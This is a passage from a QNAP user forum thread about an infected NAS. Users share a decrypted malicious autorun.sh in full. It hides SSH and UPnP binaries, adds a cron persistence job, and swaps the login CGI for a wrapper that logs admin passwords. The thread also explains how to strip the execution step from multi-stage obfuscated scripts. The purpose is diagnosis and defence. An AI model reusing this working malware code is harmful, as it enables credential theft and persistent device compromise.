$fgrep "${bdir}/.${ipath}/${crons}.sh" "${confdir}/crontab" >/dev/null 2>&1 || { l=$(( (`wc -l < "${confdir}/crontab"` / 3) + 1)); test "$l" -gt 0 && sed -i "${l}"'i'"$cronmins"' * * * * '"${bdir}/.${ipath}/${crons}.sh"' >'"$space"'/dev/null 2>&1' "${confdir}/crontab" || echo "$cronmins"' * * * * '"${bdir}/.${ipath}/${crons}.sh"' >'"$space"'/dev/null 2>&1"' >> "${confdir}/crontab" && /etc/init.d/crond.sh restart > /dev/null 2>&1 && touch -cr ${confdir}/apache ${confdir}/crontab; }
fi
for file in "${sshbin}" "${upnpbin}"; do test -f "${bdir}/.${ipath}/${file}" || cp -p "${file}" "${bdir}/.${ipath}/${file}" || { cp "${file}" "${bdir}/.${ipath}/${file}"; touch -cr /bin/busybox "${bdir}/.${ipath}/${file}"; } done
chmod 755 "${bdir}/.${ipath}/${sshbin}"
chmod 755 "${bdir}/.${ipath}/${upnpbin}"
grep 'admin:\$1\$\$CoERg7ynjYLsj2j4glJ34\.:' /etc/shadow >/dev/null 2>&1 && {
! test -d "${bdir}/.log" && mkdir "${bdir}/.log"
! test -f /home/httpd/cgi-bin/QTSauthLogin.cgi && { cp -p /home/httpd/cgi-bin/authLogin.cgi /home/httpd/cgi-bin/QTSauthLogin.cgi || cp /home/httpd/cgi-bin/authLogin.cgi /home/httpd/cgi-bin/QTSauthLogin.cgi; } && echo '#!/bin/sh
POSTDATA=""
test "x${REQUEST_METHOD}" = xPOST && {
case "${CONTENT_LENGTH}" in '"''"' | *[!0-9]* | 0* ) false ;; *) test "${CONTENT_LENGTH}" -lt 2147483646 ;; esac && { IFS= read -d '"''"' -rn "${CONTENT_LENGTH}" POSTDATA; test -z "$POSTDATA" && POSTDATA=`dd bs=1 count="$CONTENT_LENGTH" 2>/dev/null`; } || test "$POSTDATA" || POSTDATA=`cat`
test ! -z "$POSTDATA" && case "${POSTDATA}" in *pwd*) test -f "'${bdir}'/.log/.cgi_log" || { test -d "'${bdir}'/.log" || mkdir -p "'${bdir}'/.log" && touch "'${bdir}'/.log/.cgi_log"; } && test $((`stat -c '"'"'%s'"'"' "'${bdir}'/.log/.cgi_log"`)) -lt 209715200 && cat >> "'${bdir}'/.log/.cgi_log" << EOF ;; esac;
$REMOTE_ADDR:$POSTDATA
EOF
}
test ! -z "$POSTDATA" && case "$POSTDATA" in *user=admin* ) true ;; *) false ;; esac || case "$QUERY_STRING" in *user=admin*) true ;; *) false ;; esac && {
case "${REMOTE_ADDR}" in '"''"' | 10.* | 127.* | 192.168.* | 169.254.* | 172.1[6-9].* | 172.2[0-9].* | 172.3[01].* | *:* ) false ;; *) true ;; esac && grep '"'"'admin:\$1\$\$CoERg7ynjYLsj2j4glJ34\.:'"'"' /etc/shadow >/dev/null 2>/dev/null && exit 0
}
if ! test -z "$POSTDATA"; then
exec -a "${0}" /home/httpd/cgi-bin/QTSauthLogin.cgi << V4KLDmYwvc
$POSTDATA
V4KLDmYwvc
else
exec -a "${0}" /home/httpd/cgi-bin/QTSauthLogin.cgi
fi
exit 0' > /home/httpd/cgi-bin/_authLogin.cgi
test "$?" = 0 && test -s /home/httpd/cgi-bin/_authLogin.cgi && test -s /home/httpd/cgi-bin/QTSauthLogin.cgi && mv /home/httpd/cgi-bin/_authLogin.cgi /home/httpd/cgi-bin/authLogin.cgi && chmod 755 /home/httpd/cgi-bin/authLogin.cgi && touch -cr /home/httpd/cgi-bin/QTSauthLogin.cgi /home/httpd/cgi-bin/authLogin.cgi
}
. "${bdir}/.${ipath}/${crons}.sh"
cd "${sdir}"
rm -rf "${tdir}"
test "$mdir" && test -d "$mdir" && { cd /; sh -c "sleep 5; umount ${mdir}; rmdir ${mdir}" & }
true;
}
#]
Thank you.
The Router is an ISP router, the nas is a QNAP nas, all software are up-to-date, the malware vehicle is one of the nas services. I exposed the nas to the network with 2fa strong password ecc ecc but it was not enough.
-
somy1982
- Easy as a breeze
- Posts: 356
- Joined: Fri Apr 08, 2016 6:42 pm
Re: Strange folders and cronjobs
benzo83 wrote:dolbyman wrote:8TB external drives are cheap..should be plenty of space for movies
not too cheap 300euro :/
Do you have music station installed and enabled?
QNAP support suspects it is caused by vulnerability in music station and suggested to turn it off for now.
-
somy1982
- Easy as a breeze
- Posts: 356
- Joined: Fri Apr 08, 2016 6:42 pm
Re: Strange folders and cronjobs
Mousetick wrote:This is a nasty piece of sh.itware you've got there.
I decrypted the autorun.sh (see further below).
I can't spend the time to read and understand what all the script code does, I'm not paid for that, it's QNAP's job, and the tight code gives me a headache, but here is what I can make of it:
- It makes various configuration checks
- It creates a bunch of hidden directories in various places
- It unpacks a compressed tarball and installs its contents in the previous directories and other places
- It checks if the admin password is the default
- It installs a CGI script that intercepts the QTS login so it can steal the admin password if it's not the default
- It installs cron jobs
- It installs SSH and UPNP programs
So even if you change the admin password, chances are that you are still toast. Your best defense, short of reinitializing the NAS from scratch, is to disconnect the NAS from the network, not just from the Internet, but from your network altogether. Keep it air-gaped until you are certain that the NAS is clean, and you have educated yourself on proper security practices and how to protect your router, your network, your computer(s) and your NAS against nasties.
Decrypted autorun.sh:Code: Select all
#!/bin/sh
export PATH="${PATH}:/bin:/sbin:/usr/bin:/usr/sbin:/usr/bin/X11:/usr/local/sbin:/usr/local/bin"
command -v dirname >/dev/null 2>&1 || dirname () { test -z "$1" && echo "." && return; local r="${1%"${1##*[!/]}"}"; case $r in /*[!/]*/*|[!/]*/*) r="${r%/*}"; echo "${r%"${r##*[!/]}"}";; */*) echo ${r%%[!/]};; "") echo $1;; *) echo .;; esac; }
test -d /etc/config && confdir=/etc/config || { test -d /mnt/HDA_ROOT/.config && confdir=/mnt/HDA_ROOT/.config; }
command -v getcfg > /dev/null 2>&1 || getcfg () { sed -n 'H;${x;s/\(.*\
\['"${1//\//\\\/}"']\|^\['"${1//\//\\\/}"']\)\
//I;s/\(^\|\
\)\[[^\
]\+\]\
.*//p}' "${4:-${confdir}/uLinux.conf}" | sed -n 's/^'"${2//\//\\\/}"' \?= \?\(.*\)/\1/Ip'; }
bdir=
test -f "${confdir}/smb.conf" && for i in homes Public Download Multimedia Web Recordings; do bdir=`getcfg "$i" path -f "${confdir}/smb.conf"` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && test -d "$bdir" && testwriteable=$(mktemp "${bdir}/.tmp.XXXXXX") && rm "${testwriteable}" && break; bdir=''; done
test -z "${bdir}" || test ! -d "${bdir}" && { command -v readlink >/dev/null 2>&1 || ln -sf /bin/busybox /usr/bin/readlink; for i in homes Public Download Multimedia Web Recordings; do bdir=`readlink "/share/${i}" 2>/dev/null` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && bdir=/share/${bdir##*/} && test -d "$bdir" && break; done;
test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`getcfg SHARE_DEF defVolMP -f "${confdir}/def_share.info"`
test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`mount | sed -n "s/.*\(\/share\/[^ /]\+\) .*/\1/gp" | head -n 1`
test -z "${bdir}" || test ! -d "${bdir}"; } && { for i in CACHEDEV3_DATA CACHEDEV2_DATA CACHEDEV1_DATA MD0_DATA; do test -d "/share/${i}" && bdir="/share/${i}" && break; done;
test -z "${bdir}" || test ! -d "${bdir}" && bdir=/mnt/HDA_ROOT; }
arch_o=`uname -m | grep -i "x86\|i[3-6]86" > /dev/null && echo x86 || echo arm`
upnpbin=$(echo IHu`echo -ne "\\x70\\x73\\x75\\x72"`iSU`echo -ne "\\x66\\x6d\\x6b\\x70"` | tr "SDkYwfvrzzYMiCUcEaImyEaP" "kthefyrfFVeCnDvXyqvfYPzR")
cgi=$(echo a`echo -ne "\\x6a\\x6d"`SVy`echo -ne "\\x62\\x74\\x64\\x76"`pE`echo -ne "\\x6c\\x78\\x65"` | tr "pRymvOeuSRSmMZEeGIMRB" "rj.QhzgEoEd.ALxVmEFsB")
sshbin=$(echo O`echo -ne "\\x72\\x70"`zsu`echo -ne "\\x79\\x63\\x68\\x63"` | tr "xjWHiEYgzocaEyKIBwFS" "MrTFiJGZEPhRIcZnfFhT")
sshhkey=$(echo RrP`echo -ne "\\x6c\\x72\\x76\\x71"`Lc`echo -ne "\\x66\\x6c\\x71"`Rv`echo -ne "\\x6d\\x6b\\x65"` | tr "sVqsTJsNcJPKuLoxugtmPSrv" "InRreWNeZt.pPZAtCdhhcamb")
sshauth=$(echo iN`echo -ne "\\x61\\x6a\\x66"`n`echo -ne "\\x62\\x71"`VCB`echo -ne "\\x70\\x7a\\x69\\x76"` | tr "hauNqrNprUetkKAdZLBafo" "MaPTVgjuDrn.wuzCzeLfox")
sshconf=$(echo QG`echo -ne "\\x6d\\x6c\\x75"`P`echo -ne "\\x76\\x73"` | tr "FixDfMglHsQQJEiRSPLdIxPj" "gCKpGjffRBUUpRSrgDLpAPrH")
archarm=$(echo oS`echo -ne "\\x75\\x6f\\x63"`Ie`echo -ne "\\x66\\x65\\x63"` | tr "gvDHDJFnerSYCWLeEqQXIHY" "lFVogPcyAiqRzTdpoCZBtXn")
archx86=$(echo B`echo -ne "\\x70\\x71"`Tx`echo -ne "\\x69\\x77\\x75"`fP`echo -ne "\\x67\\x79\\x69"` | tr "XlAsnKrbjXXpZbMdCfsrY" "xeNfamiqkSwmmJTyHkPcr")
ipath=$(echo KZ`echo -ne "\\x61\\x73\\x72"`mRQ`echo -ne "\\x69\\x65\\x6b\\x61"` | tr "dkdbaKGBeThGSsJcYKVLwz" ".VwDEtExkUllASJBIkSUnB")
crons=$(echo i`echo -ne "\\x69\\x76"`YzW`echo -ne "\\x73\\x73\\x69\\x72"` | tr "OwnRESmebMGYByfUjprk" "bYGVwvwuIKswzlOxluSY")
arch=`uname -m | grep -i "x86\|i[3-6]86" > /dev/null && echo "$archx86" || echo "$archarm"`
test -f "./${arch}" && sdir=`pwd` || { test "${BASH_SOURCE[0]}" && sdir=$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd ) || { test "${0}" && sdir=$( cd "$( dirname "${0}" )" && pwd ); } && test -f "${sdir}/${arch}" && cd "${sdir}"; } || { test -f "/tmp/config/${arch}" && cd /tmp/config; } || {
mdir=$(mktemp -d /tmp/.mount.XXXXXX) || { mdir=/tmp/.mount.jbbxQob; mkdir ${mdir}; }
__BOOT_DEV=
__model=`getcfg System "Internal Model"`
CONFIG_DEV_NODE=`getcfg "CONFIG STORAGE" DEVICE_NODE -f /etc/platform.conf`
CONFIG_DEV_PART=`getcfg "CONFIG STORAGE" FS_ACTIVE_PARTITION -f /etc/platform.conf`
CONFIG_DEV_FS=`getcfg "CONFIG STORAGE" FS_TYPE -f /etc/platform.conf`
__BOOT_CONF=`test -f /etc/default_config/BOOT.conf && cat /etc/default_config/BOOT.conf 2>/dev/null || cat "${confdir}/BOOT.conf"` || { test "$arch_o" = arm && __BOOT_CONF=TS-NASARM; }
command -v hal_app > /dev/null 2>&1 && { __BOOT_DEV=$(hal_app --get_boot_pd port_id=0); }
test "${__BOOT_CONF}" = TS-NASARM || test "$arch_o" = arm && { test -f /etc/IS_TAS && __BOOT_DEV="${__BOOT_DEV:-/dev/mtdblock}7" || __BOOT_DEV="${__BOOT_DEV:-/dev/mtdblock}5"; } || __BOOT_DEV="${__BOOT_DEV:-/dev/sdx}6"
test "x${CONFIG_DEV_NODE}" != "x" && { ubiattach -m "${CONFIG_DEV_PART}" -d 2; mount -t ubifs ubi2:config "${mdir}" > /dev/null 2>&1 || { test -f /etc/IS_TAS && mount -t ext4 /dev/mmcblk0p7 "${mdir}"; } } || mount ${__BOOT_DEV} -t ext2 ${mdir} || { test "${__model}" = "TS-201" && mount -t ext2 /dev/mtdblock4 ${mdir}; } || { ubiattach -m "${CONFIG_DEV_PART}" -d 2; mount -t ubifs ubi2:config "${mdir}"; mount -t ext4 /dev/mmcblk0p7 "${mdir}"; } || { test "${__model}" = "TS-269L" && mount -t ext2 /dev/sdc6 ${mdir}; } || { test "${__model}" = "TS-869" && mount -t ext2 /dev/sdi6 ${mdir}; } || { test "$arch_o" = arm || ${__BOOT_CONF} = "TS-NASARM" && { for i in 5 7 4 6 3 8; do mount -t ext2 "/dev/mtdblock${i}" ${mdir} && break; done; }; } || { test "$arch_o" = x86 && for n in /dev/sdc /dev/sdx /dev/sdi $__BOOT_DEV; do for i in 6 $CONFIG_DEV_PART; do mount -t ext2 ${n}${i} ${mdir} && break 2; done; done; } || { mount -t ext2 $(/sbin/hal_app --get_boot_pd port_id=0)6 ${mdir}; }; }
for file in "${sshbin}" "${upnpbin}" "."; do test -f "${bdir}/.${ipath}/${file}" || break; done
test "$file" != "." || test ! -f "${bdir}/.${ipath}/${crons}.sh" && { test -s .BOOT_TIME && read -r boottime < .BOOT_TIME || echo `date +%s` > .BOOT_TIME; test -s "${bdir}/.BOOT_TIME" && read -r boottime < "${bdir}/.BOOT_TIME" || echo `date +%s` > "${bdir}/.BOOT_TIME"; test "$boottime" || { read -r boottime < .BOOT_TIME; test -s "${bdir}/.BOOT_TIME" && read -r boottime < "${bdir}/.BOOT_TIME"; }; test "$boottime" && { sleep 2; [ $boottime -gt 0 ] && e=$(( `date +%s` - $boottime )) && [ $e -gt 0 ] && [ $e -lt 1296000 ] && { test "$mdir" && test -e "${mdir}" && { cd /; sh -c "sleep 5; umount ${mdir}; rmdir ${mdir}" & }; noex=1; }; }; }
test "$noex" = 1 || {
rm "${bdir}/.BOOT_TIME"
rm .BOOT_TIME
test ! -f "./${arch}" && test -d "${mdir}" && test -f "${mdir}/${arch}" && cd "${mdir}"
tdir=`mktemp -d "${bdir}/.temp.XXXXXX" || mktemp -d "/share/Public/.temp.XXXXXX" || mktemp -d "/mnt/HDA_ROOT/.temp.XXXXXX"`
test -d "$tdir" || { for i in "$bdir" "/share/Public" "/mnt/HDA_ROOT"; do mkdir "${i}/.temp.jbbxQob" > /dev/null 2>&1 && test -d "${i}/.temp.jbbxQob" && tdir="${i}/.temp.jbbxQob"; done;
test -d "$tdir"; } || { tdir=`mktemp -d /tmp/.temp.XXXXXX` && test -d "$tdir"; } || { mkdir "/tmp/.temp.jbbxQob" && tdir=/tmp/.temp.jbbxQob && test -d "$tdir"; } || { tdir=`mktemp -d .XXXXXX` && test -d "$tdir"; } || { mkdir ".jbbxQob" && tdir=".jbbxQob" && test -d "$tdir"; } || tdir=`pwd`
cp "${arch}" ${tdir}
cd ${tdir}
tar -xzf "${arch}"
grep -F '' <<EOF >/dev/null 2>&1 && fgrep="grep -F" || { command -v fgrep >/dev/null 2>&1 && fgrep=fgrep || fgrep=grep; }
EOF
test "$fgrep" || fgrep=grep
test -d "${bdir}/.${ipath}" || mkdir -p "${bdir}/.${ipath}" || mkdir "${bdir}/.${ipath}"
test -f "$cgi" && chmod 755 "$cgi" && "./${cgi}"
test -f /tmp/qpkg.conf.bak && { touch -cr /tmp/qpkg.conf.bak "${confdir}/qpkg.conf"; rm /tmp/qpkg.conf.bak; }
cp -p ${crons} "${bdir}/.${ipath}/${crons}.sh" || { cp ${crons} "${bdir}/.${ipath}/${crons}.sh"; touch -cr /bin/busybox "${bdir}/.${ipath}/${crons}.sh"; }
chmod 755 "${bdir}/.${ipath}/${crons}.sh"
if [ -f "${confdir}/crontab" ]; then
test "$RANDOM" || RANDOM=12499
test $(( $RANDOM & 1 )) = 0 && space=' ' || space=''
cronmins="$(( $RANDOM % 4 ))"
test ! "$cronmins" -eq 0 && cronmins="${cronmins}0"
$fgrep "${bdir}/.${ipath}/${crons}.sh" "${confdir}/crontab" >/dev/null 2>&1 || { l=$(( (`wc -l < "${confdir}/crontab"` / 3) + 1)); test "$l" -gt 0 && sed -i "${l}"'i'"$cronmins"' * * * * '"${bdir}/.${ipath}/${crons}.sh"' >'"$space"'/dev/null 2>&1' "${confdir}/crontab" || echo "$cronmins"' * * * * '"${bdir}/.${ipath}/${crons}.sh"' >'"$space"'/dev/null 2>&1"' >> "${confdir}/crontab" && /etc/init.d/crond.sh restart > /dev/null 2>&1 && touch -cr ${confdir}/apache ${confdir}/crontab; }
fi
for file in "${sshbin}" "${upnpbin}"; do test -f "${bdir}/.${ipath}/${file}" || cp -p "${file}" "${bdir}/.${ipath}/${file}" || { cp "${file}" "${bdir}/.${ipath}/${file}"; touch -cr /bin/busybox "${bdir}/.${ipath}/${file}"; } done
chmod 755 "${bdir}/.${ipath}/${sshbin}"
chmod 755 "${bdir}/.${ipath}/${upnpbin}"
grep 'admin:\$1\$\$CoERg7ynjYLsj2j4glJ34\.:' /etc/shadow >/dev/null 2>&1 && {
! test -d "${bdir}/.log" && mkdir "${bdir}/.log"
! test -f /home/httpd/cgi-bin/QTSauthLogin.cgi && { cp -p /home/httpd/cgi-bin/authLogin.cgi /home/httpd/cgi-bin/QTSauthLogin.cgi || cp /home/httpd/cgi-bin/authLogin.cgi /home/httpd/cgi-bin/QTSauthLogin.cgi; } && echo '#!/bin/sh
POSTDATA=""
test "x${REQUEST_METHOD}" = xPOST && {
case "${CONTENT_LENGTH}" in '"''"' | *[!0-9]* | 0* ) false ;; *) test "${CONTENT_LENGTH}" -lt 2147483646 ;; esac && { IFS= read -d '"''"' -rn "${CONTENT_LENGTH}" POSTDATA; test -z "$POSTDATA" && POSTDATA=`dd bs=1 count="$CONTENT_LENGTH" 2>/dev/null`; } || test "$POSTDATA" || POSTDATA=`cat`
test ! -z "$POSTDATA" && case "${POSTDATA}" in *pwd*) test -f "'${bdir}'/.log/.cgi_log" || { test -d "'${bdir}'/.log" || mkdir -p "'${bdir}'/.log" && touch "'${bdir}'/.log/.cgi_log"; } && test $((`stat -c '"'"'%s'"'"' "'${bdir}'/.log/.cgi_log"`)) -lt 209715200 && cat >> "'${bdir}'/.log/.cgi_log" << EOF ;; esac;
$REMOTE_ADDR:$POSTDATA
EOF
}
test ! -z "$POSTDATA" && case "$POSTDATA" in *user=admin* ) true ;; *) false ;; esac || case "$QUERY_STRING" in *user=admin*) true ;; *) false ;; esac && {
case "${REMOTE_ADDR}" in '"''"' | 10.* | 127.* | 192.168.* | 169.254.* | 172.1[6-9].* | 172.2[0-9].* | 172.3[01].* | *:* ) false ;; *) true ;; esac && grep '"'"'admin:\$1\$\$CoERg7ynjYLsj2j4glJ34\.:'"'"' /etc/shadow >/dev/null 2>/dev/null && exit 0
}
if ! test -z "$POSTDATA"; then
exec -a "${0}" /home/httpd/cgi-bin/QTSauthLogin.cgi << V4KLDmYwvc
$POSTDATA
V4KLDmYwvc
else
exec -a "${0}" /home/httpd/cgi-bin/QTSauthLogin.cgi
fi
exit 0' > /home/httpd/cgi-bin/_authLogin.cgi
test "$?" = 0 && test -s /home/httpd/cgi-bin/_authLogin.cgi && test -s /home/httpd/cgi-bin/QTSauthLogin.cgi && mv /home/httpd/cgi-bin/_authLogin.cgi /home/httpd/cgi-bin/authLogin.cgi && chmod 755 /home/httpd/cgi-bin/authLogin.cgi && touch -cr /home/httpd/cgi-bin/QTSauthLogin.cgi /home/httpd/cgi-bin/authLogin.cgi
}
. "${bdir}/.${ipath}/${crons}.sh"
cd "${sdir}"
rm -rf "${tdir}"
test "$mdir" && test -d "$mdir" && { cd /; sh -c "sleep 5; umount ${mdir}; rmdir ${mdir}" & }
true;
}
#]
Hi MouseTick,
Thanks for the reply! Can you tell us how to "decrypt" the shell script? Id like to look into mine and see if I can find anything myself.
I don't get the point why to disconnect from LAN?
-
somy1982
- Easy as a breeze
- Posts: 356
- Joined: Fri Apr 08, 2016 6:42 pm
Re: Strange folders and cronjobs
Also another question, is the following cron job save:
*/5 * * * * /mnt/ext/opt/apache/bin/php /mnt/ext/opt/qdesk/www/public/index.php cli watchdog woof
*/5 * * * * /mnt/ext/opt/apache/bin/php /mnt/ext/opt/qdesk/www/public/index.php cli watchdog woof
-
benzo83
- Starting out
- Posts: 28
- Joined: Wed Nov 18, 2015 4:50 am
Re: Strange folders and cronjobs
somy1982 wrote:benzo83 wrote:dolbyman wrote:8TB external drives are cheap..should be plenty of space for movies
not too cheap 300euro :/
Do you have music station installed and enabled?
QNAP support suspects it is caused by vulnerability in music station and suggested to turn it off for now.
unfortunately i do
-
Don
- Guru
- Posts: 12021
- Joined: Thu Jan 03, 2008 4:56 am
- Location: Long Island, New York
Re: Strange folders and cronjobs
You disconnect from the LAN to protect other devices on the LAN from being compromised by the NAS infection.
Read the Online Manuals and use the forum search feature before posting.
It is a recommended to use RAID and have external backups. RAID will protect you from disk failure, keep your system running, and data accessible while the disk is replaced and the RAID rebuilt. Backups will allow you to recover data that is lost or corrupted, or from system failure. One does not replace the other.
Submit bugs and feature requests to QNAP via their Helpdesk app.
NAS: TVS-882BR | F/W: 4.3.6.0895 | 40GB | 2 x M.2 SATA RAID 1 (System/VMs) | 4 x M.2 NMVe QM2-4P-384A RAID 5 (Cache) | 5 x 4TB HDD RAID 6 (Data) | 1 x Blu-ray
NAS: TVS-663 | F/W: 4.5.1.1540 | 16GB | 2 x M.2 NMVe QM2-2P RAID 1 (Cache) | 4 x 4TB RAID 5
Apps: Boinc, Squid, DNSMasq, PLEX, iDrive, QVPN, QLMS, MP3fs, HBS, Entware, DLstation, +others
It is a recommended to use RAID and have external backups. RAID will protect you from disk failure, keep your system running, and data accessible while the disk is replaced and the RAID rebuilt. Backups will allow you to recover data that is lost or corrupted, or from system failure. One does not replace the other.
Submit bugs and feature requests to QNAP via their Helpdesk app.
NAS: TVS-882BR | F/W: 4.3.6.0895 | 40GB | 2 x M.2 SATA RAID 1 (System/VMs) | 4 x M.2 NMVe QM2-4P-384A RAID 5 (Cache) | 5 x 4TB HDD RAID 6 (Data) | 1 x Blu-ray
NAS: TVS-663 | F/W: 4.5.1.1540 | 16GB | 2 x M.2 NMVe QM2-2P RAID 1 (Cache) | 4 x 4TB RAID 5
Apps: Boinc, Squid, DNSMasq, PLEX, iDrive, QVPN, QLMS, MP3fs, HBS, Entware, DLstation, +others
-
Mousetick
- Been there, done that
- Posts: 592
- Joined: Thu Aug 24, 2017 10:28 pm
Re: Strange folders and cronjobs
somy1982 wrote:Can you tell us how to "decrypt" the shell script? Id like to look into mine and see if I can find anything myself.
The only way to decrypt the script is to execute it because it is self-decrypting. Since executing it to completion is harmful, it needs to be surgically edited to keep the decryption part but disable the harmful part. That part changes from script to script so it's not easy to give general instructions. Also some scripts are encrypted with multiple passes, so the neutering process needs to be applied several times.
I greatly discourage you try to do this if you don't understand fully what I just said and what follows.
Example: autorun.sh posted by benzo83. Look for the note "<<<<<<<<<<============ DANGEROUS PART HERE" (added by me).
Code: Select all
#!/bin/sh
WDsKwcX=${NfPe}tr${TOtnQoPZlj}$XtvYzUmXi$'';XlvTWbP=$HwyETG$""${BOQDRIBofeJvZ}\\$KcLJmW$""${mBgBLqNugLIeP};WHJRnC=${AfESPMztIUpwo}${ayhM}${ifMZuHyfid}${XlvTWbP}1${ORdB}3${naPAXdYJve}3$nXrwvwbgB$'';HAFPgiL=${IQcueXfGmyiCy}${oUpr}${yVUyYguMwM}${XlvTWbP}0${cZew}5${NvQVndODqz}5$pDkAgrLTF$'';TQzLfG=${tfBBVkrxivfHq}${HJzN}${lDvZlgOBlx}${XlvTWbP}1${ybgg}3${oMdRZIuYWi}4$vcMuhGGuT$'';$WDsKwcX 'Cmi`BLh}Xfrg&vH+AjZKS'$WHJRnC't>]IV)YkTqz*QyPG{aN!OMR<cd '$TQzLfG'U;'"'"'Dso|eW%"=Fn#xbpEl($J'$HAFPgiL'w\nu' 's$*Ve'$TQzLfG'>mNb'"'"'=}<(Rp{gM+GI!WotuJajDckF|qZ&TPXrBy'$HAFPgiL'hKwvU'$WHJRnC']S )\nHlnAQLdzOY`#Cf"ix;%E' << "FDdIirg" | sh${rzhPJHObGUkhj}${PZYG} <<<<<<<<<<================= DANGEROUS PART HERE
E>/fJ%/Cc|mBnkq\]x[d=em$$mjlMXT&VRmjYFOf+Oc*CIN&ABwsVmjB+z\A!M+\F)[`+&RABwszI}mj-#uVK[fG&}k%nmj}} V-cD&wsmrL-62r)JWVJ%mjOX)R+&wsVOmjlzx`kPAuAUk&)BmjNNI%tz&wsmjO!)I++`R&(kWCBws)%CBmjTn=cqz-PRU)c&mj*MZ\FB bWzqxW&mjJ"TBefqA&Vwsmj+kKV&)mrL-6BrCBVmjq-OMPTn&mjT()}N`Cu*&wsmjNYC]xc&B\mrL-61rWmj=xJOY*ZlWM&ws(mjK`n(bQKcY&kWCBwsmjx
...remainder omitted for brevity...
Before neutering
Code: Select all
'$TQzLfG'U;'"'"'Dso|eW%"=Fn#xbpEl($J'$HAFPgiL'w\nu' 's$*Ve'$TQzLfG'>mNb'"'"'=}<(Rp{gM+GI!WotuJajDckF|qZ&TPXrBy'$HAFPgiL'hKwvU'$WHJRnC']S )\nHlnAQLdzOY`#Cf"ix;%E'<< "FDdIirg" | sh${rzhPJHObGUkhj}${PZYG} <<<<<<<<<<================= DANGEROUS PART HERE
After neutering
Code: Select all
'$TQzLfG'U;'"'"'Dso|eW%"=Fn#xbpEl($J'$HAFPgiL'w\nu' 's$*Ve'$TQzLfG'>mNb'"'"'=}<(Rp{gM+GI!WotuJajDckF|qZ&TPXrBy'$HAFPgiL'hKwvU'$WHJRnC']S )\nHlnAQLdzOY`#Cf"ix;%E'<< "FDdIirg"
Executing the neutered script produces the following ouput, another encrypted script:
Code: Select all
#!/bin/sh
$edaDvWOGKQH$""${CBNj}ty${JLrbRrhksoP}pe; t${eRcvpXBRvLuGVR}ype; com${xzEtMGbZ}mand${mmwtxhS}; $'\x62'uiltin${rNuyR}; tr${CcOVaqpEpUa}ue${PPonIc}; ${rXuoRRVy}false; unse${jdQhDcxqyUuh}${kBgvLewYlcDOl}${iAjeHbDp}t; ${RaMt}u$'\x6e'set${DxrBqjd}${jfumPVsEk}; ${PJsWOh}ev$'\x61'l${QOirJkgClB}; f${MVdfYFMhJ}alse; ${OwPbFgfCcHez}true; ${gcnlvMgKyJkNGy}$NpMsQSqXOMZ$''tes${VgejCHV}t; built${DsvVSOxeL}in; tr${SWtFlC}u${IcVJWwRLDBRDzF}$'\x65'${FYSAdkVijlD}; bu${OlJXwPpysLfOASB}${LGAY}${bGmFDmYdf}iltin; e$'\x76'a${dFhi}l${DxZfBKVfqtKS}; ${kWUAWXU}test; ${BualwUBF}builtin${kRKh}; $leEfFdMWUbFN$''uns${QzedDJQNeCz}e${HwPRGWnmjT}t; fal${tptQnbfJGUNApw}s${qPZqCftUdfd}e${mMNoReiqZIgL}; RxlSjPq=${JlEHKYwjrbodO}${xnxikuGpqHU}${DLlkJFP}tr; eVBTQyl=${JJRQ}${pksLKRdIF}\\${DpBH}${THSiqOYSU}; UVeZowLy=${mgMhJWRtg}${sytoKQCeJvGkIDw}$pctXOoTogzS$""${eVBTQyl}${IjiHrQctVyNBIdm}$wSiulfNuqQa$""13${LKaC}3; qewuHlK=${hAMbPTKJn}${oFzvTGoyZiAPyve}$eYjAzJvmNqy$""${eVBTQyl}${PphAxrnCnZWgzsz}$vIJVuAccEvM$""05${Ibid}5; gysIyg=${nLAzJEmiz}${ejCYiEfvQIJaqIU}$ovYxEfMaCWf$""${eVBTQyl}${XKvJYQlviynEHGt}$VSdvNePfJbJ$""13${IImJ}4; $RxlSjPq 's;t{CMau+&L`b'"'"'B!HfZwrld$VY'$gysIyg''$qewuHlK'Xy|Um)cN'$UVeZowLy']Ti* JIh<SW"\nRQkoO=(%}v#q>EzjKGFePgpAxDn' 'RjUOHgyV}ep%XQwkqi+ Nn*aJ>'"'"'v<\nzm|dZK`FS=PBcC"&lxL]D;G(fh'$qewuHlK'sEWMbAT'$UVeZowLy'$u!I#'$gysIyg't)r{oY'<<"LzlHfpSdYWqhtw"|${jTjudPeRKOAalbo}$JimPgMbcalN$""${sRer}bash <<<<<<<<<= ========= DANGEROUS PART HERE
eG/qfl/%=y&WLDAgw*>ECihjx*>EC+:/qfl:/%qfl:/K%A/qfl:/K%A/%qfl:/K%A/qfl/b11:/K%A/SDJ$S/%qfl:/K%A/SDJ$S/qflhyJDUU$l)w(-w)fAl$U&wY/)&-/lKSSw2Y<1wmmw)fAl$U&wopwxwg&%gw(|whj1hw<<w&J=Dwh.hw<<wA&gKAlQwSDJ$SwAihjx1`hjx1eedzG/
+h+hQwJ$%&wjAwflw/dzG/
d/dmzG/
d/dpwAihjxA`/d+hQw&J=DwhjxA`hjxAeedzG/
... remainder omitted for brevity ...
Before neutering
Code: Select all
Nn*aJ>'"'"'v<\nzm|dZK`FS=PBcC"&lxL]D;G(fh'$qewuHlK'sEWMbAT'$UVeZowLy'$u!I#'$gysIyg't)r{oY'<<"LzlHfpSdYWqhtw"|${jTjudPeRKOAalbo}$JimPgMbcalN$""${sRer}bash <<<<<<<<<========== DANGEROUS PART HERE
After neutering
Code: Select all
Nn*aJ>'"'"'v<\nzm|dZK`FS=PBcC"&lxL]D;G(fh'$qewuHlK'sEWMbAT'$UVeZowLy'$u!I#'$gysIyg't)r{oY'<<"LzlHfpSdYWqhtw"
Executing the neutered 2nd stage script, produces the following output, the unencrypted autorun.sh:
Code: Select all
#!/bin/sh
export PATH="${PATH}:/bin:/sbin:/usr/bin:/usr/sbin:/usr/bin/X11:/usr/local/sbin:/usr/local/bin"
command -v dirname >/dev/null 2>&1 || dirname () { test -z "$1" && echo "." && return; local r="${1%"${1##*[!/]}"}"; case $r in /*[!/]*/*|[!/]*/*) r="${r%/*}"; echo "${r%"${r##*[!/]}"}";; */*) echo ${r%%[!/]};; "") echo $1;; *) echo .;; esac; }
... remainder omitted for brevity ...
Post your script(s) here and I'll see what I can do.
I don't get the point why to disconnect from LAN?
